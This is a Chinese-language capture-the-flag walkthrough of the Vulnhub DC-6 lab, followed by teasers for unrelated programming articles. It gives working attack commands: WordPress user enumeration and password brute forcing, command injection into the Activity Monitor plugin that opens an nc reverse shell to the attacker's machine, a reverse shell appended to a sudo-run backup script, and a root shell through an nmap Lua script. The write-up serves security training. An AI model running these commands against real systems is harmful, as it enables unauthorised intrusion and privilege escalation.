Vulnhub靶机 DC-6 打靶实战 详细渗透测试过程

Vulnhub靶机 DC-6 详细渗透流程 打靶实战

目录

  • Vulnhub靶机 DC-6 详细渗透流程 打靶实战
    • 一、将靶机导入到虚拟机当中
    • 二、渗透测试
      • 主机发现
      • 端口扫描
      • 信息探测
      • web渗透
        • 目录爆破
        • 爆破后台密码
        • 反弹shell
        • 搜集有价值信息
        • SSH远程登录
        • 提权
        • 反弹jens用户权限的shell 提权利用

一、将靶机导入到虚拟机当中

靶机地址:

https://www.vulnhub.com/entry/dc-6,315/

image-20240420155007993

二、渗透测试

主机发现

通过使用arp-scan命令或者使用nmap命令进行主机发现

arp-scan -l

image-20240420155133549

端口扫描

nmap -p- 192.168.0.106

image-20240420155207724

开发22和80端口,且服务为SSH和HTTP服务,详细探测一下

nmap -p80 -sV -A 192.168.0.106
whatweb http://192.168.0.106

image-20240420155340749

信息探测

发现此web服务采用WordPress CMS

image-20240420155438359

访问web界面:访问前先配置一下hosts本地解析

image-20240420155540636

修改完成后即可完成本地域名解析,成功访问,并通过浏览器插件信息收集到此网站的一些服务信息和版本信息

image-20240420155521234

web渗透

通过信息收集得到使用WordPress CMS,那么直接使用kali的wpscan工具进行扫描探测,并枚举用户信息

wpscan --url http://wordy -e u

成功枚举出五位用户的信息,并保存到记事本当中

image-20240420155912465

目录爆破

爆破网站的目录,获取信息

dirsearch -u http://wordy -i 200

发现网站的登录界面,进行访问

image-20240420160058052

image-20240420160148033

爆破后台密码

通过我们之前得到的用户名信息,可进行密码的爆破

ps:根据作者的提示,从密码字典当中保存以下密码,可节省时间

image-20240420160339534

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txtwpscan --url http://wordy -U user.txt -P passwords.txt

成功爆破出mark的用户名密码信息,登录后台

用户名:mark
密码:helpdesk01

image-20240420160757960

成功登入后台,发现有可执行命令的地方,在Activity monitor插件处

image-20240420161000851

反弹shell

此工具为ip测试工具,测试一下,输入127.0.0.1

image-20240420161331912

可成功,那么接下来进行拼接系统命令,测试可否正常回显

127.0.0.1 | ls

image-20240420161455509

发现可以正常的命令回显,那么接下来直接进行反弹shell,kali端开启监听

//靶机:
127.0.0.1 | nc -e /bin/bash 192.168.0.107 8888//kali
nc -lvvp 8888

由于输入长度有限制,可以修改前端代码或者使用burp直接修改数据包

image-20240420161845407

或者使用burp修改数据包

image-20240420162057811

成功接收shell,此shell权限为www-data权限,普通权限

image-20240420161908851

获取稳定shell

python -c "import pty;pty.spawn('/bin/bash')"

image-20240420162203112

搜集有价值信息

当前目录下无可利用的文件信息,查看家目录,发现有四个用户信息,逐一查看,发现在jens家目录和mark家目录下有文件信息,逐一查看

jens家目录下的文件为一个shell脚本,内容为打包网站的信息

image-20240420171213647

SSH远程登录

mark家目录下有一个文件夹,文件夹当中为一个txt文本文件,查看后发现graham用户的信息,尝试ssh远程登录到graham

ssh graham@192.168.0.106

image-20240420171400193

image-20240420171442670

提权

查找suid权限内容

find / -perm -u=s -type f 2>/dev/null

image-20240420171542905

sudo利用失败

image-20240420171753483

image-20240420171820897

/etc目录下也无可利用文件,/etc/passwd等文件均无法利用

反弹jens用户权限的shell 提权利用
sudo -l

查看sudo -l 下的内容,发现有jens用户权限执行的脚本,正是刚才我们刚才看见的shell脚本,接下来可以利用此,来反弹jens用户权限的shell

image-20240420171842323

echo "nc -e /bin/bash 192.168.0.107 6666" >> backups.sh 

image-20240420172048916

sudo -u jens /home/jens/backups.sh

image-20240420172328091

kali端成功接收到shell

image-20240420172317396

sudo -l 再次查看一下jens用户下的有无root用户可执行的命令或者脚本,发现存在nmap命令,并以root权限执行

image-20240420172416627

接下来就是利用nmap进行提权,首先创建一个脚本

touch root_shell.sh
echo 'os.execute("/bin/sh")' > root_shell.sh
sudo nmap --script=root_shell.sh

成功提权,通关

image-20240420172732668

文章不妥之处,欢迎批评指正!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/bicheng/1868.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

stable diffusion本地部署@win10

一键无脑安装stable-diffusion-webui stable diffusion是当前非常出色的文生图模型,要优于以前gan文生图模型。现在有了stable-diffusion-webui软件,可以一键安装,大大简化了操作难度。本文档就是stable-diffusion-webui在windows 10上的安装…

openfeign整合sentinel进行降级

pom.xml <!--nacos-服务注册发现--> <dependency><groupId>com.alibaba.cloud</groupId><artifactId>spring-cloud-starter-alibaba-nacos-discovery</artifactId> </dependency> <!--添加openfeign依赖--> <dependency&g…

誉天教育新班上新,免费试听!

数通HCIP 周末班 2024/4/20 阮老师 RHCE 周末班 2024/4/20 徐老师 云计算直通车 周末班 2024/4/20 田老师 欧拉HCIE 周末班 2024/4/20 晏老师 存储HCIE 晚班 2024/4/22 高老师 云服务直通车 周末班 2024/4/27 高老师 安全HCIE 晚班 2024/5/6 胡老…

#天空星定时器点灯

一、定时器信息 STM32F407VET6一共有14个定时器&#xff0c;包括2个高级控制定时器、8个通用定时器、2个基本定时器和2个看门狗定时器。 高级定时器&#xff08;TIMER1和TIMER8&#xff09;是四通道定时器&#xff0c;支持输入捕获和输出比较。可以产生PWM信号控制电机和电源管…

基于springboot实现的摄影跟拍预定管理系统

开发语言&#xff1a;Java 框架&#xff1a;springboot JDK版本&#xff1a;JDK1.8 服务器&#xff1a;tomcat7 数据库&#xff1a;mysql 5.7&#xff08;一定要5.7版本&#xff09; 数据库工具&#xff1a;Navicat11 开发软件&#xff1a;eclipse/myeclipse/idea Maven…

嵌入式Linux开发实操(十九):Nand Flash驱动的实现

前言: nand flash从硬件连接上看,如下图,有专用接口,数据线有8或16根。 Nand Flash按每个存储单元Cell内存储比特个数不同可分为 SLC(Single-Level Cell存储1个比特)、MLC(Multi-Level Cell存储2个比特) 、 TLC(Triple-Level Cell存储3个比特)、QLC(Quad-Level C…

mysql基础9——时间函数

统计一天中每小时的销售数量和销售金额 将数据按照小时进行分组统计 关键就是把交易时间的小时部分提取出来 使用extract()和hour() 使用extract()获取小时的值 extract(type from date) 表示从日期时间数据date中抽取type指定的部分 select extract(hour from b.transd…

❤️新版Linux零基础快速入门到精通——第三部分❤️

❤️新版Linux零基础快速入门到精通——第三部分❤️ 非科班的我&#xff01;Ta&#xff01;还是来了~~~3. Linux权限管控3.1 认知root用户3.1.1 Switch User——su3.1.2 sudo命令3.1.3 为普通用户配置sudo认证 3.2 用户和用户组3.2.1 用户、用户组3.2.2 用户组管理3.2.3 用户管…

突破编程_前端_SVG(元素碰撞检测)

1 什么是碰撞检测 SVG 元素的碰撞检测&#xff0c;顾名思义&#xff0c;就是检测两个或多个 SVG 图形元素是否发生相交或重叠的过程。这在许多场景中都非常有用&#xff0c;例如游戏开发、动画设计、交互式图表等&#xff0c;需要精确判断图形元素之间的位置关系。 SVG 元素的…

声明式事务

文章目录 1.事务分类1.传统方式解决事务2.声明式事务 2.声明式事务案例1.需求分析2.解决方案分析3.数据表创建4.编写GoodsDao.java1.编写配置文件JdbcTemplate_ioc.xml2.单元测试 5.编写GoodsService.java6.配置事务管理器JdbcTemplate_ioc.xml7.进行测试 3.debug事务管理器Dat…

【Linux】在ubuntu快速搭建部署K8S(1.27)集群

ubuntu快速安装K8s1.27 &#xff08;一&#xff09;环境说明1.硬件环境2.Ubuntu环境设置 &#xff08;二&#xff09;安装配置containerd1.安装2.配置3.启动 &#xff08;三&#xff09;所有节点操作1.安装runc和cni2.节点系统设置、关闭临时分区3.修改内核参数4.安装 kubeadm、…

力扣爆刷第124天之回溯五连刷

力扣爆刷第124天之回溯五连刷&#xff08;分割回文、复原IP、子集&#xff09; 文章目录 力扣爆刷第124天之回溯五连刷&#xff08;分割回文、复原IP、子集&#xff09;一、131. 分割回文串二、93. 复原 IP 地址三、78. 子集四、90. 子集 II五、91. 非递减子序列 一、131. 分割…

稀碎从零算法笔记Day56-LeetCode:组合总和 Ⅳ

题型&#xff1a;DP、数组 链接&#xff1a;377. 组合总和 Ⅳ - 力扣&#xff08;LeetCode&#xff09; 来源&#xff1a;LeetCode 题目描述 给你一个由 不同 整数组成的数组 nums &#xff0c;和一个目标整数 target 。请你从 nums 中找出并返回总和为 target 的元素组合的…

【算法刷题day30】Leetcode:332. 重新安排行程、51. N 皇后、37. 解数独

文章目录 Leetcode 332. 重新安排行程解题思路代码总结 Leetcode 51. N 皇后解题思路代码总结 Leetcode 37. 解数独解题思路代码总结 草稿图网站 java的Deque Leetcode 332. 重新安排行程 题目&#xff1a;332. 重新安排行程 解析&#xff1a;代码随想录解析 解题思路 代码 /…

代码随想录算法训练营第四十一天| 343.整数拆分、96.不同的二叉搜索树

系列文章目录 目录 系列文章目录343. 整数拆分动态规划 96.不同的二叉搜索树动态规划 343. 整数拆分 动态规划 动规五部曲&#xff1a; 确定dp数组&#xff08;dp table&#xff09;以及下标的含义&#xff1a;dp[i]表示分拆数字i&#xff0c;可以得到的最大乘积为dp[i]。确…

盲人出行挑战与曙光:“盲人视觉辅助技术研发”助力无障碍生活

作为一名资深记者&#xff0c;我深感盲人朋友们在日常出行中面临的种种困难。然而&#xff0c;在科技日新月异的今天&#xff0c;一项名为蝙蝠避障的专为盲人视觉辅助技术研发的领域正在以前沿科技成果&#xff0c;为改善盲人出行困境带来希望之光。本文将深入探讨这一技术如何…

力扣刷题4.22

88. 合并两个有序数组 解题思路&#xff1a; 双指针加单指针 同时从后往前遍历原始的nums1和2&#xff0c;比较大小&#xff0c;大的往后站。 class Solution:def merge(self, nums1: List[int], m: int, nums2: List[int], n: int) -> None:"""Do not ret…

FastGPT+ChatGLM3本地部署

FastGPTChatGLM本地部署 本地部署硬性要求&#xff1a;显存13g以上 关于环境的安装就不多赘述&#xff0c;conda pip 可以解决大部分问题 ChatGLM本地运行 m3e-basechatglm3-6b 在huggingface上可以下载上述模型&#xff0c;如果没有梯子可以使用huggingface镜像 从git…

【C++刷题】优选算法——动态规划第五辑

最长公共子序列 状态表示:选取第一个字符串[0,i]区间和第二个字符串[0,j]区间作为研究对象dp[i][j]: 表示s1的[0,i]区间和s2的[0,j]区间内的所有子序列中&#xff0c;最长公共子序列的长度 状态转移方程:text1[i] text2[j]:dp[i][j] dp[i-1][j-1] 1;text1[i] ! text2[j]:dp…

【进程地址空间】地址空间理解存在原因 | 深入理解页表写时拷贝虚拟地址

目录 地址空间深入理解 划分区域 理解地址空间 地址空间存在的意义 意义1 意义2 意义3 理解页表和写时拷贝 页表 写时拷贝 OS识别错误 理解虚拟地址 fork解释 上篇我们简单的学习了进程地址空间/页表/物理地址/虚拟地址/写时拷贝等概念。本篇深入理解下。 地址空…